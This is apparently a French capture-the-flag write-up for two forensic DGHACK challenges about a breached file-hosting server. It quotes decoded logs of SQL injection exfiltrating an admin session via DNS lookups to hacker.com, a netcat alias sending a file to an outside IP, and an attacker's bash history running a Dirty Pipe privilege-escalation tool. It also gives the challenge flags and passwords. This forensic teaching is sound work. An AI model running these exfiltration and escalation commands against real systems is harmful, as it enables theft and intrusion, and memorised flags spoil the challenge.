# Shadow4DGA (niveau 1)

## Description

Après une fuite d'information sur l'internet : https://pastebin.com/WfPgGMSn. Un service d'hébergement anonyme pour les militaires français s'est fait attaquer. Le système permet le téléchargement de fichiers top secret protégés par le système S.O.P.H.I.A. Le système a besoin d'un identifiant de fichier puis d'un mot de passe d'accès.

Il semblerait que la sécurité sur la base de données n'était pas suffisamment élevée. Un premier administrateur est intervenu pour réparer la vulnérabilité et supprimer la backdoor PHP. Aidez-le en détectant l'intrusion sur le serveur et essayez de comprendre ce que le hacker a exfiltré.

Enregistrez le flag avec le modèle ci-après : DGHACK{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...}

Lien:
- un environnement virtuel chez [Malice](https://malice.fr/).

## Solution

On récupère le pastebin :

```
C0M1N7-5H4D0W4D64
TCOGVVQV:W6W9D3A/60/RC=
```

On se connecte sur le serveur fourni et on farfouille. On trouve un c99shell sous `/var/www/shadow4dga/block_system/CR4T0G9U.php`.

On se dit que bon, il va suffire de lire les logs du serveur web pour trouver ce qui a été fait à travers ce shell. C'est la déception, [le fichier](sqlshadow.log) semble encodé. 

On trouve la manipulation faite dans `/var/www/shadow4dga/includes/logger.php`:
```php
<?php
defined('INCLUDES_CMS') ? INCLUDES_CMS : exit;

function logger($hdl)
{
    $q = base64_encode(gzdeflate(pdo_debugStrParams($hdl), 9));
    return wh_log($q);
}

function pdo_debugStrParams($stmt)
{
    ob_start();
    $stmt->debugDumpParams();
    $r = ob_get_contents();
    ob_end_clean();
    return $r;
}

function wh_log($log_msg)
{
    $path = "/var/log/web/";
    $log_filename = $path."sqlshadow.log";
    if (!file_exists($log_filename)) {
        mkdir($path, 0775, true);
    }
    $log_msg = '[' . date('d-M-Y h:i:s') . '] - ' . $log_msg;
    return @file_put_contents($log_filename, $log_msg . "\n", FILE_APPEND);
}
```

On bricole rapidement [une moulinette en PHP](decod_log.php) pour le décoder, et on trouve ceci :

```
SQL: [154] (SELECT * FROM files LIMIT 10 OFFSET 0);CREATE PROCEDURE exf(data varchar(100)) BEGIN SELECT LOAD_FILE(CONCAT('\\',data,'\a'));END;select 0,NULL,NULL;--);
Params:  0
SQL: [96] (SELECT * FROM files LIMIT 10 OFFSET 0);CALL exf('beginexf.hacker.com'));select 0,NULL,NULL;--);
Params:  0
SQL: [162] (SELECT * FROM files LIMIT 10 OFFSET 0);CALL exf(CONCAT(SUBSTRING((select session from users where username='admin'),1,63),'.hacker.com'));select 0,NULL,NULL;--);
Params:  0
SQL: [162] (SELECT * FROM files LIMIT 10 OFFSET 0);CALL exf(CONCAT(SUBSTRING((select session from users where username='admin'),1,63),'.hacker.com'));select 0,NULL,NULL;--);
Params:  0
SQL: [162] (SELECT * FROM files LIMIT 10 OFFSET 0);CALL exf(CONCAT(SUBSTRING((select session from users where username='admin'),1,63),'.hacker.com'));select 0,NULL,NULL;--);
Params:  0
SQL: [163] (SELECT * FROM files LIMIT 10 OFFSET 0);CALL exf(CONCAT(SUBSTRING((select session from users where username='admin'),64,63),'.hacker.com'));select 0,NULL,NULL;--);
Params:  0
SQL: [163] (SELECT * FROM files LIMIT 10 OFFSET 0);CALL exf(CONCAT(SUBSTRING((select session from users where username='admin'),64,63),'.hacker.com'));select 0,NULL,NULL;--);
Params:  0
SQL: [163] (SELECT * FROM files LIMIT 10 OFFSET 0);CALL exf(CONCAT(SUBSTRING((select session from users where username='admin'),64,63),'.hacker.com'));select 0,NULL,NULL;--);
Params:  0
SQL: [94] (SELECT * FROM files LIMIT 10 OFFSET 0);CALL exf('endexf.hacker.com'));select 0,NULL,NULL;--);
Params:  0
SQL: [93] (SELECT * FROM files LIMIT 10 OFFSET 0);CALL exf('hacked.hacker.com');select 0,NULL,NULL;--);
Params:  0
SQL: [93] (SELECT * FROM files LIMIT 10 OFFSET 0);CALL exf('hacked.hacker.com');select 0,NULL,NULL;--);
Params:  0
SQL: [93] (SELECT * FROM files LIMIT 10 OFFSET 0);CALL exf('hacked.hacker.com');select 0,NULL,NULL;--);
```

On voir donc que l'attaquant a récupérer la session de l'utilisateur admin. En farfouillant de nouveau dans le code du serveur web, on se rend compte que le cookie de session admin est fixe et hardcodé dans `/var/www/shadow4dga/admin.php` :

```php
$is_admin = false;
if ($_COOKIE["session"] === "b86eb8dae7809614b94dda9116a68f4a71a25cfe9e9a0b4f53621d87110930848204f157efc3defd5afb5b8b2fb9f6f560d26dc425532f1a77bc8ae3e07fcfc6") {
    $is_admin = true; // IS ADMIN
```

C'est la valeur de ce cookie de session qui a été exfiltrée, le flag est donc `DGHACK{b86eb8dae7809614b94dda9116a68f4a71a25cfe9e9a0b4f53621d87110930848204f157efc3defd5afb5b8b2fb9f6f560d26dc425532f1a77bc8ae3e07fcfc6}`.


# Shadow4DGA (niveau 2)

## Description

Après le piratage du service d'hébergement anonyme pour les militaires français. Il semblerait que le pirate a réussi à élever ses privilèges pour installer une porte dérobée persistante pour l'utilisateur root.

Détectez l'intrusion avancée sur le serveur et essayez de comprendre ce que le pirate a exfiltré.

## Solution

On a cette fois l'accès root sur le même serveur que précédemment.

```console
# ls -lart
total 40
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
-rw-r--r--  1 root root  303 May  6  2022 .profile
drwxr-xr-x  3 root root 4096 Jun 10 14:40 .local
drwx------  3 root root 4096 Jun 16 17:01 .ansible
drwxr-xr-x 18 root root 4096 Jul  5 16:30 ..
-rwxrwxrwx  1 root root  121 Jul  6 16:08 bd.sh
-rwxrwxrwx  1 root root 6331 Jul  6 16:18 system.py
drwx------  4 root root 4096 Jul  6 16:24 .
-rw-------  1 root root    0 Jul  6 16:26 .bash_history
-rw-r--r--  1 root root   56 Nov 10 22:04 .aliases

# cat .aliases 
alias exfiltration="nc -vn 174.10.50.30 4444 < /vsystem
```

Bon, en fait, c'est [system.py](system.py) qui a l'air de faire le boulot, mais il a l'air joliment obfusqué. Avec un minimum d'effort, on le décode pour obtenir [system_décodé.py](system_décodé.py).

Malheureusement, ça ne nous avance pas. Revenons à l'`.aliases`: il envoie le contenu de [vsystem](vsystem).

```console
root@malice:~# file /vsystem 
/vsystem: Zip archive data, at least v2.0 to extract
root@malice:~# unzip -t /vsystem
Archive:  /vsystem
[/vsystem] DGHACK{tres_secret_defense}.png password:
```

Le flag ne fonctionne pas, c'est une fausse piste. Mais on a quand même très envie de voir le contenu de ce PNG.

Au hasard des recherches, on trouve d'autres fausses pistes :

```console
# cat /home/app/.bash_history 
echo DGHACK{N1CE_T0_M33T_Y0U}
whoami
ls -lthar
./traitor-amd64 --exploit kernel:CVE-2022-0847
exit
ls
ls -lthar
pwd
cd /home/app
wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
chmod 777 traitor-amd64
./traitor-amd64 --exploit kernel:CVE-2022-0847
export PATH=/usr/local/bin:/usr/local/  sbin:/usr/bin:/usr/sbin:/bin:/sbin
./traitor-amd64 --exploit kernel:CVE-2022-0847
python3 -c 'import pty; pty.spawn("/bin/bash")'
exit
```

Encore un faux flag, mais on a trouvé l'escalade de privilège utilisée par l'attaquant. On continue à farfouiller et on trouve aussi un fichier `.swp` dans la corbeille de root (`.local/share/Trash/setup.php.swp`). [Ce fichier](setup.php) contient plusieurs mots de passe, que l'on essaie systématiquement sur le zip, et c'est finalement `m?btM0e@1Zy@uqEkYJ@eUo0A8@q@ya` qui fonctionne et donne :

![](DGHACK{tres_secret_defense}.png)

C'est rigolo ce logo du [Geipan](https://geipan.fr/), ça intrigue beaucoup. En dehors de ça, c'est juste une photo satellite d'un terrain de la DGA. On sort [l'attirail de stéganographie](https://github.com/lordOric/steg-tools) et c'est finalement un [LSB](https://github.com/lordOric/steg-tools/blob/main/lsb_detect.py) qui nous donne le flag : 

![](DGHACK{tres_secret_defense}_bit0.png)

`DGHACK{L'empire_du_milieu_c@che_les_@liens}`